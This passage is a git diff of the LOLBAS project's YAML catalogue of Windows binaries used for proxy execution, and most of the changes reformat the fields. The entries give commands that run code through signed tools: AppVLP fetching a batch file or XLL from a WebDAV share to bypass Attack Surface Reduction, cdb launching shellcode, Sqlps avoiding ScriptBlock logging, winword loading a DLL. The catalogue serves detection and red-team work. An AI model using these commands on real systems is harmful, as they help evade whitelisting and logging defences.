https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSScripts/Payload/Slmgr.reg + - Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSScripts/Payload/Slmgr_calc.sct +Detection: + - IOC: Resources: - - https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology - - https://www.youtube.com/watch?v=3gz1QmiMhss - - https://github.com/enigma0x3/windows-operating-system-archaeology - - https://redcanary.com/blog/lateral-movement-winrm-wmi/ - - https://twitter.com/bohops/status/994405551751815170 -Notes: Thanks to Matt Nelson - @enigma0x3 (Hijack), Casey Smith - @subtee (Hijack), Red Canary Company cc Tony Lambert - @redcanaryco (Win32_Process LM), Jimmy - @bohops (Win32_Service LM) - + - Link: https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology + - Link: https://www.youtube.com/watch?v=3gz1QmiMhss + - Link: https://github.com/enigma0x3/windows-operating-system-archaeology + - Link: https://redcanary.com/blog/lateral-movement-winrm-wmi/ + - Link: https://twitter.com/bohops/status/994405551751815170 +Acknowledgement: + - Person: Matt Nelson + Handle: '@enigma0x3' + - Person: Casey Smith + Handle: '@subtee' + - Person: Jimmy + Handle: '@bohops' + - Person: Red Canary Company cc Tony Lambert + Handle: '@redcanaryco' +--- \ No newline at end of file diff --git a/yml/OSScripts/pester.yml b/yml/OSScripts/pester.yml index 640b59f..9dbc7cd 100644 --- a/yml/OSScripts/pester.yml +++ b/yml/OSScripts/pester.yml @@ -1,18 +1,27 @@ --- -Name: pester.bat -Description: Execute code using Pester. The third parameter can be anything. The fourth is the payload. -Author: '' +Name: Pester.bat +Description: Used as part of the Powershell pester +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - - Command: Pester.bat [/help|?|-?|/?] "$null; notepad" - Description: Execute notepad + - Command: Pester.bat [/help|?|-?|/?] "$null; notepad" + Description: Execute code using Pester. The third parameter can be anything. The fourth is the payload. Example here executes notepad + Usecase: Proxy execution + Category: Execute + Privileges: User + MitreID: T1216 + MitreLink: https://attack.mitre.org/wiki/Technique/T1216 + OperatingSystem: Windows 10 Full Path: - - c:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\bin\Pester.bat - - c:\Program Files\WindowsPowerShell\Modules\Pester\*\bin\Pester.bat -Code Sample: [] -Detection: [] + - Path: c:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\bin\Pester.bat + - Path: c:\Program Files\WindowsPowerShell\Modules\Pester\*\bin\Pester.bat +Code Sample: + - Code: +Detection: + - IOC: Resources: - - https://twitter.com/Oddvarmoe/status/993383596244258816 - - https://github.com/api0cradle/LOLBAS/blob/master/OSScripts/pester.md -Notes: Thanks to Emin Atac - @p0w3rsh3ll + - Link: https://twitter.com/Oddvarmoe/status/993383596244258816 +Acknowledgement: + - Person: Emin Atac + Handle: '@p0w3rsh3ll' +--- \ No newline at end of file diff --git a/yml/OtherMSBinaries/Appvlp.yml b/yml/OtherMSBinaries/Appvlp.yml index e09d706..a6746b2 100644 --- a/yml/OtherMSBinaries/Appvlp.yml +++ b/yml/OtherMSBinaries/Appvlp.yml @@ -7,7 +7,7 @@ Commands: - Command: AppVLP.exe \\webdav\calc.bat Usecase: Execution of BAT file hosted on Webdav server. Description: Executes calc.bat through AppVLP.exe - Category: Execution + Category: Execute Privileges: User MitreID: T1218 MitreLink: https://attack.mitre.org/wiki/Technique/T1218 @@ -15,7 +15,7 @@ Commands: - Command: AppVLP.exe powershell.exe -c "$e=New-Object -ComObject shell.application;$e.ShellExecute('calc.exe','', '', 'open', 1)" Usecase: Local execution of process bypassing Attack Surface Reduction (ASR). Description: Executes powershell.exe as a subprocess of AppVLP.exe and run the respective PS command. - Category: Execution + Category: Execute Privileges: User MitreID: T1218 MitreLink: https://attack.mitre.org/wiki/Technique/T1218 @@ -23,21 +23,23 @@ Commands: - Command: AppVLP.exe powershell.exe -c "$e=New-Object -ComObject excel.application;$e.RegisterXLL('\\webdav\xll_poc.xll')" Usecase: Local execution of process bypassing Attack Surface Reduction (ASR). Description: Executes powershell.exe as a subprocess of AppVLP.exe and run the respective PS command. - Category: Execution + Category: Execute Privileges: User MitreID: T1218 MitreLink: https://attack.mitre.org/wiki/Technique/T1218 OperatingSystem: Windows 10 w/Office 2016 Full Path: - - C:\Program Files\Microsoft Office\root\client\appvlp.exe - - C:\Program Files (x86)\Microsoft Office\root\client\appvlp.exe -Code Sample: [] -Detection: [] + - Path: C:\Program Files\Microsoft Office\root\client\appvlp.exe + - Path: C:\Program Files (x86)\Microsoft Office\root\client\appvlp.exe +Code Sample: + - Code: +Detection: + - IOC: Resources: - - https://github.com/MoooKitty/Code-Execution - - https://twitter.com/moo_hax/status/892388990686347264 - - https://enigma0x3.net/2018/06/11/the-tale-of-settingcontent-ms-files/ - - https://securityboulevard.com/2018/07/attackers-test-new-document-attack-vector-that-slips-past-office-defenses/ + - Link: https://github.com/MoooKitty/Code-Execution + - Link: https://twitter.com/moo_hax/status/892388990686347264 + - Link: https://enigma0x3.net/2018/06/11/the-tale-of-settingcontent-ms-files/ + - Link: https://securityboulevard.com/2018/07/attackers-test-new-document-attack-vector-that-slips-past-office-defenses/ Acknowledgement: - Person: fab Handle: '@0rbz_' @@ -45,3 +47,4 @@ Acknowledgement: Handle: '@moo_hax' - Person: Matt Wilson Handle: '@enigma0x3' +--- diff --git a/yml/OtherMSBinaries/Bginfo.yml b/yml/OtherMSBinaries/Bginfo.yml index 41a53f3..e82b02f 100644 --- a/yml/OtherMSBinaries/Bginfo.yml +++ b/yml/OtherMSBinaries/Bginfo.yml @@ -29,13 +29,14 @@ Commands: MitreLink: https://attack.mitre.org/wiki/Technique/T1218 OperatingSystem: Windows Full Path: - - No fixed path + - Path: No fixed path Code Sample: - Code: Detection: - IOC: Resources: - - https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/ + - Link: https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/ Acknowledgement: - Person: Oddvar Moe Handle: '@oddvarmoe' +--- \ No newline at end of file diff --git a/yml/OtherMSBinaries/Cdb.yml b/yml/OtherMSBinaries/Cdb.yml index 399037f..e0f7fcc 100644 --- a/yml/OtherMSBinaries/Cdb.yml +++ b/yml/OtherMSBinaries/Cdb.yml @@ -7,20 +7,23 @@ Commands: - Command: cdb.exe -cf x64_calc.wds -o notepad.exe Description: Launch 64-bit shellcode from the x64_calc.wds file using cdb.exe. Usecase: Local execution of assembly shellcode. - Category: Execution + Category: Execute Privileges: User MitreID: T1218 MitreLink: https://attack.mitre.org/wiki/Technique/T1218 OperatingSystem: Windows Full Path: - - C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\cdb.exe - - C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\cdb.exe -Code Sample: [] -Detection: [] + - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\cdb.exe + - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\cdb.exe +Code Sample: + - Code: +Detection: + - IOC: Resources: - - http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html - - https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/cdb-command-line-options - - https://gist.github.com/mattifestation/94e2b0a9e3fe1ac0a433b5c3e6bd0bda + - Link: http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html + - Link: https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/cdb-command-line-options + - Link: https://gist.github.com/mattifestation/94e2b0a9e3fe1ac0a433b5c3e6bd0bda Acknoledgement: - Person: Matt Graeber Handle: '@mattifestation' +--- \ No newline at end of file diff --git a/yml/OtherMSBinaries/Csi.yml b/yml/OtherMSBinaries/Csi.yml index 3a3744b..0e90270 100644 --- a/yml/OtherMSBinaries/Csi.yml +++ b/yml/OtherMSBinaries/Csi.yml @@ -7,19 +7,22 @@ Commands: - Command: csi.exe file Description: Use csi.exe to run unsigned C# code. Usecase: Local execution of unsigned C# code. - Category: Execution + Category: Execute Privileges: User MitreID: T1218 MitreLink: https://attack.mitre.org/wiki/Technique/T1218 OperatingSystem: Windows Full Path: - - c:\Program Files (x86)\Microsoft Visual Studio\2017\Community\MSBuild\15.0\Bin\Roslyn\csi.exe - - c:\Program Files (x86)\Microsoft Web Tools\Packages\Microsoft.Net.Compilers.X.Y.Z\tools\csi.exe -Code Sample: [] -Detection: [] + - Path: c:\Program Files (x86)\Microsoft Visual Studio\2017\Community\MSBuild\15.0\Bin\Roslyn\csi.exe + - Path: c:\Program Files (x86)\Microsoft Web Tools\Packages\Microsoft.Net.Compilers.X.Y.Z\tools\csi.exe +Code Sample: + - Code: +Detection: + - IOC: Resources: - - https://twitter.com/subTee/status/781208810723549188 - - https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/ + - Link: https://twitter.com/subTee/status/781208810723549188 + - Link: https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/ Acknowledgement: - Person: Casey Smith Handle: '@subtee' +--- diff --git a/yml/OtherMSBinaries/Dnx.yml b/yml/OtherMSBinaries/Dnx.yml index 5d5a53c..68ab14d 100644 --- a/yml/OtherMSBinaries/Dnx.yml +++ b/yml/OtherMSBinaries/Dnx.yml @@ -7,18 +7,20 @@ Commands: - Command: dnx.exe consoleapp Description: Execute C# code located in the consoleapp folder via 'Program.cs' and 'Project.json' (Note - Requires dependencies) Usecase: Local execution of C# project stored in consoleapp folder. - Category: Execution + Category: Execute Privileges: User MitreID: T1218 MitreLink: https://attack.mitre.org/wiki/Technique/T1218 OperatingSystem: Windows Full Path: - - N/A -Code Sample: [] -Detection: [] + - Path: N/A +Code Sample: + - Code: +Detection: + - IOC: Resources: - - https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/ + - Link: https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/ Acknowledgement: - Person: Matt Nelson Handle: '@enigma0x3' - +--- \ No newline at end of file diff --git a/yml/OtherMSBinaries/Dxcap.yml b/yml/OtherMSBinaries/Dxcap.yml index 2a76f89..0fbbb24 100644 --- a/yml/OtherMSBinaries/Dxcap.yml +++ b/yml/OtherMSBinaries/Dxcap.yml @@ -7,18 +7,21 @@ Commands: - Command: Dxcap.exe -c C:\Windows\System32\notepad.exe Description: Launch notepad as a subprocess of Dxcap.exe Usecase: Local execution of a process as a subprocess of Dxcap.exe - Category: Execution + Category: Execute Privileges: User MitreID: T1218 MitreLink: https://attack.mitre.org/wiki/Technique/T1218 OperatingSystem: Windows Full Path: - - c:\Windows\System32\dxcap.exe - - c:\Windows\SysWOW64\dxcap.exe -Code Sample: [] -Detection: [] + - Path: C:\Windows\System32\dxcap.exe + - Path: C:\Windows\SysWOW64\dxcap.exe +Code Sample: + - Code: +Detection: + - IOC: Resources: - - https://twitter.com/harr0ey/status/992008180904419328 + - Link: https://twitter.com/harr0ey/status/992008180904419328 Acknowledgement: - Person: Matt harr0ey Handle: '@harr0ey' +--- \ No newline at end of file diff --git a/yml/OtherMSBinaries/Mftrace.yml b/yml/OtherMSBinaries/Mftrace.yml index 527dae1..81bdb98 100644 --- a/yml/OtherMSBinaries/Mftrace.yml +++ b/yml/OtherMSBinaries/Mftrace.yml @@ -7,7 +7,7 @@ Commands: - Command: Mftrace.exe cmd.exe Description: Launch cmd.exe as a subprocess of Mftrace.exe. Usecase: Local execution of cmd.exe as a subprocess of Mftrace.exe. - Category: Execution + Category: Execute Privileges: User MitreID: T1218 MitreLink: https://attack.mitre.org/wiki/Technique/T1218 @@ -15,20 +15,23 @@ Commands: - Command: Mftrace.exe powershell.exe Description: Launch cmd.exe as a subprocess of Mftrace.exe. Usecase: Local execution of powershell.exe as a subprocess of Mftrace.exe. - Category: Execution + Category: Execute Privileges: User MitreID: T1218 MitreLink: https://attack.mitre.org/wiki/Technique/T1218 OperatingSystem: Windows Full Path: - - C:\Program Files (x86)\Windows Kits\10\bin\10.0.16299.0\x86 - - C:\Program Files (x86)\Windows Kits\10\bin\10.0.16299.0\x64 - - C:\Program Files (x86)\Windows Kits\10\bin\x86 - - C:\Program Files (x86)\Windows Kits\10\bin\x64 -Code Sample: [] -Detection: [] + - Path: C:\Program Files (x86)\Windows Kits\10\bin\10.0.16299.0\x86 + - Path: C:\Program Files (x86)\Windows Kits\10\bin\10.0.16299.0\x64 + - Path: C:\Program Files (x86)\Windows Kits\10\bin\x86 + - Path: C:\Program Files (x86)\Windows Kits\10\bin\x64 +Code Sample: + - Code: +Detection: + - IOC: Resources: - - https://twitter.com/0rbz_/status/988911181422186496 (Currently not accessible) + - Link: https://twitter.com/0rbz_/status/988911181422186496 Acknowledgement: - Person: fabrizio Handle: '@0rbz_' +--- diff --git a/yml/OtherMSBinaries/Msdeploy.yml b/yml/OtherMSBinaries/Msdeploy.yml index f98f5e0..b180e03 100644 --- a/yml/OtherMSBinaries/Msdeploy.yml +++ b/yml/OtherMSBinaries/Msdeploy.yml @@ -7,17 +7,20 @@ Commands: - Command: msdeploy.exe -verb:sync -source:RunCommand -dest:runCommand="c:\temp\calc.bat" Description: Launch calc.bat via msdeploy.exe. Usecase: Local execution of batch file using msdeploy.exe. - Category: Execution + Category: Execute Privileges: User MitreID: T1218 MitreLink: https://attack.mitre.org/wiki/Technique/T1218 OperatingSystem: Windows Full Path: - - C:\Program Files (x86)\IIS\Microsoft Web Deploy V3\msdeploy.exe -Code Sample: [] -Detection: [] + - Path: C:\Program Files (x86)\IIS\Microsoft Web Deploy V3\msdeploy.exe +Code Sample: + - Code: +Detection: + - IOC: Resources: - - https://twitter.com/pabraeken/status/995837734379032576 + - Link: https://twitter.com/pabraeken/status/995837734379032576 Acknowledgement: - Person: Pierre-Alexandre Braeken Handle: '@pabraeken' +--- diff --git a/yml/OtherMSBinaries/Msxsl.yml b/yml/OtherMSBinaries/Msxsl.yml index c6d3d5f..e50007c 100644 --- a/yml/OtherMSBinaries/Msxsl.yml +++ b/yml/OtherMSBinaries/Msxsl.yml @@ -21,10 +21,15 @@ Commands: MitreLink: https://attack.mitre.org/wiki/Technique/T1218 OperatingSystem: Windows Full Path: - - '' -Code Sample: [] -Detection: [] + - Path: +Code Sample: + - Code: +Detection: + - IOC: Resources: - - https://twitter.com/subTee/status/877616321747271680 - - https://github.com/3gstudent/Use-msxsl-to-bypass-AppLocker -Notes: Thanks to Casey Smith - @subTee (Finding), 3gstudent - @3gstudent (Remote) + - Link: https://twitter.com/subTee/status/877616321747271680 + - Link: https://github.com/3gstudent/Use-msxsl-to-bypass-AppLocker +Acknowledgement: + - Person: Casey Smith + Handle: '@subtee' +--- diff --git a/yml/OtherMSBinaries/Rcsi.yml b/yml/OtherMSBinaries/Rcsi.yml index 958d278..1054b60 100644 --- a/yml/OtherMSBinaries/Rcsi.yml +++ b/yml/OtherMSBinaries/Rcsi.yml @@ -12,11 +12,15 @@ Commands: MitreID: T1218 MitreLink: https://attack.mitre.org/wiki/Technique/T1218 OperatingSystem: Windows -Full Path: '' -Code Sample: [] -Detection: [] +Full Path: + - Path: +Code Sample: + - Code: +Detection: + - IOC: Resources: - - https://enigma0x3.net/2016/11/21/bypassing-application-whitelisting-by-using-rcsi-exe/ + - Link: https://enigma0x3.net/2016/11/21/bypassing-application-whitelisting-by-using-rcsi-exe/ Acknowledgement: - Person: Matt Nelson Handle: '@enigma0x3' +--- \ No newline at end of file diff --git a/yml/OtherMSBinaries/Sqldumper.yml b/yml/OtherMSBinaries/Sqldumper.yml index bd4c30c..ebc26a0 100644 --- a/yml/OtherMSBinaries/Sqldumper.yml +++ b/yml/OtherMSBinaries/Sqldumper.yml @@ -21,14 +21,17 @@ Commands: MitreLink: https://attack.mitre.org/wiki/Technique/T1003 OperatingSystem: Windows Full Path: - - C:\Program Files\Microsoft SQL Server\90\Shared\SQLDumper.exe - - C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis\AS OLEDB\140\SQLDumper.exe -Code Sample: [] -Detection: [] + - Path: C:\Program Files\Microsoft SQL Server\90\Shared\SQLDumper.exe + - Path: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis\AS OLEDB\140\SQLDumper.exe +Code Sample: + - Code: +Detection: + - IOC: Resources: - - https://twitter.com/countuponsec/status/910969424215232518 - - https://twitter.com/countuponsec/status/910977826853068800 - - https://support.microsoft.com/en-us/help/917825/how-to-use-the-sqldumper-exe-utility-to-generate-a-dump-file-in-sql-se + - Link: https://twitter.com/countuponsec/status/910969424215232518 + - Link: https://twitter.com/countuponsec/status/910977826853068800 + - Link: https://support.microsoft.com/en-us/help/917825/how-to-use-the-sqldumper-exe-utility-to-generate-a-dump-file-in-sql-se Acknowledgement: - Person: Luis Rocha Handle: '@countuponsec' +--- \ No newline at end of file diff --git a/yml/OtherMSBinaries/Sqlps.yml b/yml/OtherMSBinaries/Sqlps.yml index 7c57407..1586ce8 100644 --- a/yml/OtherMSBinaries/Sqlps.yml +++ b/yml/OtherMSBinaries/Sqlps.yml @@ -7,17 +7,20 @@ Commands: - Command: Sqlps.exe -noprofile Description: Drop into a SQL Server PowerShell console without Module and ScriptBlock Logging. Usecase: Execute PowerShell commands without ScriptBlock logging. - Category: Execution + Category: Execute Privileges: User MitreID: T1218 MitreLink: https://attack.mitre.org/wiki/Technique/T1218 OperatingSystem: Windows Full Path: - - C:\Program files (x86\Microsoft SQL Server\100\Tools\Binn\sqlps.exe -Code Sample: [] -Detection: [] + - Path: C:\Program files (x86\Microsoft SQL Server\100\Tools\Binn\sqlps.exe +Code Sample: + - Code: +Detection: + - IOC: Resources: - - https://twitter.com/bryon_/status/975835709587075072 + - Link: https://twitter.com/bryon_/status/975835709587075072 Acknowledgement: - Person: Bryon Handle: '@bryon_' +--- \ No newline at end of file diff --git a/yml/OtherMSBinaries/Sqltoolsps.yml b/yml/OtherMSBinaries/Sqltoolsps.yml index 59cbafa..97e379f 100644 --- a/yml/OtherMSBinaries/Sqltoolsps.yml +++ b/yml/OtherMSBinaries/Sqltoolsps.yml @@ -7,17 +7,20 @@ Commands: - Command: SQLToolsPS.exe -noprofile -command Start-Process calc.exe Description: Run PowerShell scripts and commands. Usecase: Execute PowerShell command. - Category: Execution + Category: Execute Privileges: User MitreID: T1218 MitreLink: https://attack.mitre.org/wiki/Technique/T1218 OperatingSystem: Windows Full Path: - - C:\Program files (x86)\Microsoft SQL Server\130\Tools\Binn\sqlps.exe -Code Sample: [] -Detection: [] + - Path: C:\Program files (x86)\Microsoft SQL Server\130\Tools\Binn\sqlps.exe +Code Sample: + - Code: +Detection: + - IOC: Resources: - - https://twitter.com/pabraeken/status/993298228840992768 + - Link: https://twitter.com/pabraeken/status/993298228840992768 Acknowledgement: - Person: Pierre-Alexandre Braeken Handle: '@pabraeken' +--- \ No newline at end of file diff --git a/yml/OtherMSBinaries/Te.yml b/yml/OtherMSBinaries/Te.yml index ce3871c..7a71d43 100644 --- a/yml/OtherMSBinaries/Te.yml +++ b/yml/OtherMSBinaries/Te.yml @@ -7,16 +7,20 @@ Commands: - Command: te.exe bypass.wsc Description: Run COM Scriptlets (e.g. VBScript) by calling a Windows Script Component (WSC) file. Usecase: Execute Visual Basic script stored in local Windows Script Component file. - Category: Execution + Category: Execute Privileges: User MitreID: T1218 MitreLink: https://attack.mitre.org/wiki/Technique/T1218 OperatingSystem: Windows -Full Path: '' -Code Sample: [] -Detection: [] +Full Path: + - Path: +Code Sample: + - Code: +Detection: + - IOC: Resources: - - https://twitter.com/gn3mes1s/status/927680266390384640?lang=bg + - Link: https://twitter.com/gn3mes1s/status/927680266390384640?lang=bg Acknowlegement: - Person: Giuseppe N3mes1s Handle: '@gN3mes1s' +--- diff --git a/yml/OtherMSBinaries/Tracker.yml b/yml/OtherMSBinaries/Tracker.yml index ba7c208..014ac44 100644 --- a/yml/OtherMSBinaries/Tracker.yml +++ b/yml/OtherMSBinaries/Tracker.yml @@ -12,12 +12,16 @@ Commands: MitreID: T1218 MitreLink: https://attack.mitre.org/wiki/Technique/T1218 OperatingSystem: Windows -Full Path: '' -Code Sample: [] -Detection: [] +Full Path: + - Path: +Code Sample: + - Code: +Detection: + - IOC: Resources: - - https://twitter.com/subTee/status/793151392185589760 - - https://attack.mitre.org/wiki/Execution + - Link: https://twitter.com/subTee/status/793151392185589760 + - Link: https://attack.mitre.org/wiki/Execution Acknowledgment: - Person: Casey Smith Handle: '@subTee' +--- diff --git a/yml/OtherMSBinaries/Vsjitdebugger.yml b/yml/OtherMSBinaries/Vsjitdebugger.yml index a1cb5c6..2f8b912 100644 --- a/yml/OtherMSBinaries/Vsjitdebugger.yml +++ b/yml/OtherMSBinaries/Vsjitdebugger.yml @@ -1,23 +1,26 @@ --- Name: vsjitdebugger.exe -Description: Just-In-Time (JIT) debugger included with Visual Studio.. +Description: Just-In-Time (JIT) debugger included with Visual Studio Author: 'Oddvar Moe' Created: '2018-05-25' Commands: - Command: Vsjitdebugger.exe calc.exe Description: Executes calc.exe as a subprocess of Vsjitdebugger.exe. Usecase: Execution of local PE file as a subprocess of Vsjitdebugger.exe. - Category: Execution + Category: Execute Privileges: User MitreID: T1218 MitreLink: https://attack.mitre.org/wiki/Technique/T1218 OperatingSystem: Windows Full Path: - - c:\windows\system32\vsjitdebugger.exe -Code Sample: [] -Detection: [] + - Path: c:\windows\system32\vsjitdebugger.exe +Code Sample: + - Code: +Detection: + - IOC: Resources: - - https://twitter.com/pabraeken/status/990758590020452353 + - Link: https://twitter.com/pabraeken/status/990758590020452353 Acknowledgement: - Person: Pierre-Alexandre Braeken Handle: '@pabraeken' +--- diff --git a/yml/OtherMSBinaries/Winword.yml b/yml/OtherMSBinaries/Winword.yml index 9094ad1..0e60895 100644 --- a/yml/OtherMSBinaries/Winword.yml +++ b/yml/OtherMSBinaries/Winword.yml @@ -7,20 +7,23 @@ Commands: - Command: winword.exe /l dllfile.dll Description: Launch DLL payload. Usecase: Execute a locally stored DLL using winword.exe. - Category: Execution + Category: Execute Privileges: User MitreID: T1218 MItreLink: https://attack.mitre.org/wiki/Technique/T1218 OperatingSystem: Windows Full Path: - - c:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE -Code Sample: [] -Detection: [] + - Path: c:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE +Code Sample: + - Code: +Detection: + - IOC: Resources: - - https://twitter.com/vysecurity/status/884755482707210241 - - https://twitter.com/Hexacorn/status/885258886428725250 + - Link: https://twitter.com/vysecurity/status/884755482707210241 + - Link: https://twitter.com/Hexacorn/status/885258886428725250 Acknowledgement: - Person: Vincent Yiu (cmd) Handle: '@@vysecurity' - Person: Adam (Internals) Handle: '@Hexacorn' +--- \ No newline at end of file